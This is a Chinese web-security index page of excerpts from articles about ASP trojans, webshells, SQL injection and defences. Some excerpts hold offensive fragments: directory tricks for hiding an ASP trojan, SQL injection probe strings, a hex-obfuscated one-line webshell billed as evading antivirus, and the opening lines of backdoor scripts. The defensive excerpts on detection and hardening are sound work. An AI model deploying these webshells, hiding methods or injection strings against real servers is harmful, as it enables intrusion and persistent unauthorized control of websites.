木马相关

隐藏ASP木马后门的两种方法 2016-05-25

下面的两种方法可以将你的asp木马隐藏,大家可以测试下1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login ...

全面认识ASP注入技巧 2016-05-08

代码如下:1.判断是否有注入  ;and 1=1  ;and 1=2  2.初步判断是否是mssql  ;and user>0  3.注入参数是字符  'and [查询条件] and ''='  4.搜索时没过滤参数的  'and [查询条件] and '%25'='  5.判断数据库系统  ;and (select count(*) from sysobjects) ...

JavaScript实现带自动提示的文本框效果代码 2016-04-27

JavaScript 制作带自动提示的文本框,需要的朋友可以参考下.示例一:直接编写AJAX 实现. 客户端: 代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-trans ...

aspjavascript在线管理 2016-03-14

代码如下:<%@LANGUAGE="JScript" CODEPAGE="936"%><%var sSelfPath = Server.MapPath(Request.ServerVariables("SCRIPT_NAME")(1)).toLowerCase();var sUrl = Reque ...

asp一句话木马原理分析 2016-03-07

一句话木马插入到asp文件中 :这个是当然,一句话木马本身就是asp文件.能够用IE访问:能访问,我们才可以提交数据..只要能访问的都可以通过HTTP协议来访问 一句话木马的使用范围(我只列举了2种): 1)只有数据库备份的情况 数据库备份成asp文件时候,不出现" 编译错误,缺少脚本关闭标志%>" 2)SA权限的时候,一般先写入一句话,图个方便. ...

一个查ASP木马的小东东 2016-02-04

关于查ASP木马的程序,记得半年前在八进制发了一个测试版(具体的URL:http://forum.eviloctal.com/read-htm-tid-19665.html),得到很多朋友的指导,学到了很多东西,非常感谢他们.现在我发的这个升级版,修补了以前的bug,加入了对一些组件写文件函数的检测,更加趋于完美了,个人认为想绕过去有点难度哦. 这回的默认密码是securi ...

跨站脚本执行漏洞详解与防护 2015-11-20

本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该漏洞.由于时间仓促,水平有限,本文可能有不少错误,希望大家不吝赐教.  声明,请不要利用本文介绍的任何内容,代码或方法进行破坏,否则一切后果自负!  [漏洞成因]  原因很简 ...

用asp实现的iframe批量替换工具 2015-11-14

说明: 1.此工具可以批量替换网站上asp,.txt,php,aspx...等等文本型的字符 2.将replace.asp上传至网站根目录后,运行http://网站域名/replace.asp 3.为了安全,使用本程序后请删除或更名 代码如下:<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> ...

如何防范ASP木马 2015-11-11

本文主要介绍了修改三个组件来达到防范asp木马攻击,需要的朋友可以参考下修改三个组件来达到防asp木马攻击.FileSystemObject组件---对文件进行常规操作.WScript.Shell组件---可以调用系统内核运行DOS命令.Shell.Application组件--可以调用系统内核运行DOS命令. 一.使用FileSystemObject组件 1.可以通过修改 ...

隐蔽的ASP后门大家可以查看下 2015-10-23

这段代码可以隐藏在asp文件中,大家可以搜索一些特点的关键字,查看文件的修改日期,看看是不是有如下的代码. 代码如下: <%if request.QueryString("action")="log" then a=Request.TotalBytes:if a Then b="adodb.stream":S ...

一句话asp木马加密版彻底突破杀毒软件 2015-10-22

不知道怎样表达清楚.看例子吧: 代码如下:<script language=vbs runat=server>  Execute(HextoStr("65786563757465287265717565737428636872283335292929"))  Function HextoStr(data)  HextoStr="EX ...

隐藏修改文件时间和文件属性的ASP脚本 2015-10-21

隐藏并修改文件的最后修改时间的aspshell,所有大家以后在查找木马的时候不能简单的根据时间来判断. 代码如下:<% '隐藏并修改文件的最后修改时间的aspshell '原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等:FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件 ' 通过shell.application可以给文件重 ...

七步倒┈→专用asp后门 2015-10-01

<html> <head> <title>七步倒┈→专用asp后门</title> </head> </html> <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next% ...

新型ASP后门源代码分析 2015-09-17

本是为了逃LAKER2兄 查ASP木马程序的  现在已经挑战成功,已经加为检查对象了.公布出代码给冰点的朋友使使,希望大家喜欢!  利用的是ADOX.Catalog组件  代码如下:<%    'code by netpatch   dim dbfile,sql    db="netpatch.asp"   dbfile=server.MapPat ...

防范ASP木马的十大基本原则强列建议看下 2015-09-01

由于ASP它本身是服务器提供的一项服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁.因此针对ASP木马的防范和清除,为网管人员提出了更高的技术要求.      几个大的程序全部被发现存在上传漏洞,小程序更是不计其数,让asp木马一下占据了主流,得到广泛的使用,想必如果你是做服务器的话,一定为此头疼不止吧, ...

也谈跨站脚本攻击与防御 2015-07-13

网络上曾经有过关于跨站脚本攻击与防御的文章,但是随着攻击技术的进步,以前的关于跨站脚本攻击的看法与理论已经不能满足现在的攻击与防御的需要了,而且由于这种对于跨站脚本认识上的混乱,导致现在很多的程序包括现在的动网都存在着跨站脚本过滤不严的问题,希望本文能给写程序的与研究程序的带来一点思路. 还是首先看看跨站脚本漏洞的成因,所谓跨站脚本漏洞其实就是Html的注入问题,恶意用户的 ...

在MsSql、Access两种数据库中插入记录后马上得到自动编号的ID值 2015-07-08

本编文章将要介绍重点解释如何在Ms Sql Server中更新或添加一条记录后立即得到其标识列的值,这个值在ACCESS就是我们熟知的自动编号的 ID值,好了,闲话不多说,代码我也不多写,只写关键些,相信各位高手一看就明白,呵呵.后面也附带了在ACCESS中获取的方法,虽然在ACCESS 中获取自动编号的文章网上虽然很多,但放在此做为一个总结吧. Set testRs=Se ...